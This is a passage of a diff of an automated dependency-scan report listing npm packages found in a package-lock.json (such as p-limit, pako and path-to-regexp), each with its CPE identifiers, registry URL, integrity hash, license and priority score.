cpe:2.3:a:p:p-limit:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p:p_limit:3.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/p-limit@3.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz + integrity: sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ== + dependencies: + yocto-queue: ^0.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 16add8edeff36c6a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: p-locate 4.1.0' + title: p-locate 4.1.0 + description: 'Package discovered: p-locate 4.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ee16619fa3035ca6 + name: p-locate + version: 4.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:p-locate:p-locate:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p-locate:p_locate:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_locate:p-locate:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_locate:p_locate:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p:p-locate:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p:p_locate:4.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/p-locate@4.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz + integrity: sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A== + dependencies: + p-limit: ^2.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 94f4f30dde8856c2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: p-try 2.2.0' + title: p-try 2.2.0 + description: 'Package discovered: p-try 2.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ee061a11e32e10c1 + name: p-try + version: 2.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:p-try:p-try:2.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p-try:p_try:2.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_try:p-try:2.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p_try:p_try:2.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p:p-try:2.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:p:p_try:2.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/p-try@2.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz + integrity: sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8f14c9999630c748 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: package-json-from-dist 1.0.1' + title: package-json-from-dist 1.0.1 + description: 'Package discovered: package-json-from-dist 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d82606f27243dac6 + name: package-json-from-dist + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BlueOak-1.0.0 + spdxExpression: BlueOak-1.0.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:package-json-from-dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package-json-from-dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package_json_from_dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package_json_from_dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package-json-from:package-json-from-dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package-json-from:package_json_from_dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package_json_from:package-json-from-dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package_json_from:package_json_from_dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package-json:package-json-from-dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package-json:package_json_from_dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package_json:package-json-from-dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package_json:package_json_from_dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package:package-json-from-dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:package:package_json_from_dist:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/package-json-from-dist@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz + integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 09093ffb9ed76376 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: pako 0.2.9' + title: pako 0.2.9 + description: 'Package discovered: pako 0.2.9' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7762d448aa187997 + name: pako + version: 0.2.9 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: (MIT AND Zlib) + spdxExpression: (MIT AND Zlib) + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:pako:pako:0.2.9:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/pako@0.2.9 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/pako/-/pako-0.2.9.tgz + integrity: sha512-NUcwaKxUxWrZLpDG+z/xZaCgQITkA/Dv4V/T6bw7VON6l1Xz/VnrBqrYjZQ12TamKHzITTfOEIYUj48y2KXImA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d21476c4aa5bcc9d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: pako 1.0.11' + title: pako 1.0.11 + description: 'Package discovered: pako 1.0.11' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8811cee431746c6d + name: pako + version: 1.0.11 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: (MIT AND Zlib) + spdxExpression: (MIT AND Zlib) + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:pako:pako:1.0.11:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/pako@1.0.11 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/pako/-/pako-1.0.11.tgz + integrity: sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b50b24498bc5a2c6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: parse-svg-path 0.1.2' + title: parse-svg-path 0.1.2 + description: 'Package discovered: parse-svg-path 0.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7c5d21eaeee09ad2 + name: parse-svg-path + version: 0.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:parse-svg-path:parse-svg-path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse-svg-path:parse_svg_path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse_svg_path:parse-svg-path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse_svg_path:parse_svg_path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse-svg:parse-svg-path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse-svg:parse_svg_path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse_svg:parse-svg-path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse_svg:parse_svg_path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse:parse-svg-path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:parse:parse_svg_path:0.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/parse-svg-path@0.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/parse-svg-path/-/parse-svg-path-0.1.2.tgz + integrity: sha512-JyPSBnkTJ0AI8GGJLfMXvKq42cj5c006fnLz6fXy6zfoVjJizi8BNTpu8on8ziI1cKy9d9DGNuY17Ce7wuejpQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 09bae738f1e39a33 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: parseley 0.12.1' + title: parseley 0.12.1 + description: 'Package discovered: parseley 0.12.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 22f6c66ddf9c06f1 + name: parseley + version: 0.12.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:parseley:parseley:0.12.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/parseley@0.12.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/parseley/-/parseley-0.12.1.tgz + integrity: sha512-e6qHKe3a9HWr0oMRVDTRhKce+bRO8VGQR3NyVwcjwrbhMmFCX9KszEV35+rn4AdilFAq9VPxP/Fe1wC9Qjd2lw== + dependencies: + leac: ^0.6.0 + peberminta: ^0.9.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 37de8d05673d8403 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: parseurl 1.3.3' + title: parseurl 1.3.3 + description: 'Package discovered: parseurl 1.3.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 484c0b9a6084b4bb + name: parseurl + version: 1.3.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:parseurl:parseurl:1.3.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/parseurl@1.3.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz + integrity: sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4b3d2fa0f1f98ea0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: path-exists 4.0.0' + title: path-exists 4.0.0 + description: 'Package discovered: path-exists 4.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7c130f49f1f39739 + name: path-exists + version: 4.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:path-exists:path-exists:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-exists:path_exists:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_exists:path-exists:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_exists:path_exists:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path-exists:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path_exists:4.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/path-exists@4.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz + integrity: sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5bb936b7686247f0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: path-expression-matcher 1.5.0' + title: path-expression-matcher 1.5.0 + description: 'Package discovered: path-expression-matcher 1.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 802e4db060f878e6 + name: path-expression-matcher + version: 1.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:path-expression-matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-expression-matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_expression_matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_expression_matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path-expression-matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path_expression_matcher:1.5.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/path-expression-matcher@1.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz + integrity: sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ffd71e909718c27d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: path-key 3.1.1' + title: path-key 3.1.1 + description: 'Package discovered: path-key 3.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f9cf628256388076 + name: path-key + version: 3.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:path-key:path-key:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-key:path_key:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_key:path-key:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_key:path_key:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path-key:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path_key:3.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/path-key@3.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz + integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fbb7614ee3db4371 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: path-parse 1.0.7' + title: path-parse 1.0.7 + description: 'Package discovered: path-parse 1.0.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9cf335be710ffc91 + name: path-parse + version: 1.0.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:path-parse_project:path-parse:1.0.7:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/path-parse@1.0.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz + integrity: sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 135178fee69fc7b7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: path-scurry 1.11.1' + title: path-scurry 1.11.1 + description: 'Package discovered: path-scurry 1.11.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f605927959537dfd + name: path-scurry + version: 1.11.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BlueOak-1.0.0 + spdxExpression: BlueOak-1.0.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:path-scurry:path-scurry:1.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-scurry:path_scurry:1.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_scurry:path-scurry:1.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_scurry:path_scurry:1.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path-scurry:1.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path_scurry:1.11.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/path-scurry@1.11.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz + integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA== + dependencies: + lru-cache: ^10.2.0 + minipass: ^5.0.0 || ^6.0.2 || ^7.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ad5632f7c396e60c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: path-to-regexp 0.1.13' + title: path-to-regexp 0.1.13 + description: 'Package discovered: path-to-regexp 0.1.13' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e6c60d0f52ae43b7 + name: path-to-regexp + version: 0.1.13 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:path-to-regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-to-regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_to_regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_to_regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-to:path-to-regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path-to:path_to_regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_to:path-to-regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path_to:path_to_regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path-to-regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:path:path_to_regexp:0.1.13:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/path-to-regexp@0.1.13 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: 